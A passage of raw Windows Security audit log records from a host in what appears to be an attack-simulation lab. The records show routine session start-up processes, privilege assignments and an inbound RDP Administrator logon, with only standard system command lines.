The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278826
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: DWM-3
Account Domain: Window Manager
Logon GUID: {00000000-0000-0000-0000-000000000000}
Target Server:
Target Server Name: localhost
Additional Information: localhost
Process Information:
Process ID: 0xe78
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Network Address: -
Port: -
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278825
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278824
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1184
New Process Name: C:\Windows\System32\LogonUI.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe78
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: "LogonUI.exe" /flags:0x2 /state0:0xa39db855 /state1:0x41c64e6d
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278823
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1b14
Process Name: C:\Windows\System32\smss.exe
Exit Status: 0x0
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278822
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe78
New Process Name: C:\Windows\System32\winlogon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1b14
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: winlogon.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278821
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1780
New Process Name: C:\Windows\System32\csrss.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1b14
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278820
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b14
New Process Name: C:\Windows\System32\smss.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x140
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: \SystemRoot\System32\smss.exe 000000d4 0000007c
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278819
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBD38F5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 174.27.138.219
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): NTLM V2
Key Length: 128
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278818
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBD38F5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4776
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Credential Validation
OpCode=Info
RecordNumber=278817
Keywords=Audit Success
Message=The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: Administrator
Source Workstation:
Error Code: 0x0
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278816
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 908
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 174.27.138.219
Source Port: 60809
Destination Address: 10.0.1.15
Destination Port: 3389
Protocol: 6
Filter Information:
Filter Run-Time ID: 66639
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278861
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1184
Process Name: C:\Windows\System32\LogonUI.exe
Exit Status: 0x0
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278860
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xab8
Process Name: C:\Windows\System32\AtBroker.exe
Exit Status: 0x1
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278859
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
New Process ID: 0xab8
New Process Name: C:\Windows\System32\AtBroker.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x1f4
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: atbroker.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278858
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xbec
Process Name: C:\Windows\System32\rdpclip.exe
Exit Status: 0x0
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=278857
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBDFD01
Logon Type: 10
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278856
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\NETWORK SERVICE
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Target Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
New Process ID: 0xbec
New Process Name: C:\Windows\System32\rdpclip.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x38c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: rdpclip
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278855
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1148
New Process Name: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278854
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1578
New Process Name: C:\Windows\servicing\TrustedInstaller.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x26c
Creator Process Name: C:\Windows\System32\services.exe
Process Command Line: C:\Windows\servicing\TrustedInstaller.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278853
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Privileges: SeAssignPrimaryTokenPrivilege
SeTcbPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278852
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x26c
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278851
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
New Process ID: 0x16e0
New Process Name: C:\Windows\System32\TSTheme.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\TSTheme.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278850
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278849
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278848
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278847
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBDFD01
Privileges: SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278846
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 10
Restricted Admin Mode: No
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0xBDFD01
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x454
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: WIN-HOST-5
Source Network Address: 174.27.138.219
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278845
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon GUID: {00000000-0000-0000-0000-000000000000}
Target Server:
Target Server Name: localhost
Additional Information: localhost
Process Information:
Process ID: 0x454
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Network Address: 174.27.138.219
Port: 0
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4776
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Credential Validation
OpCode=Info
RecordNumber=278844
Keywords=Audit Success
Message=The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: Administrator
Source Workstation: WIN-HOST-5
Error Code: 0x0
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278843
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
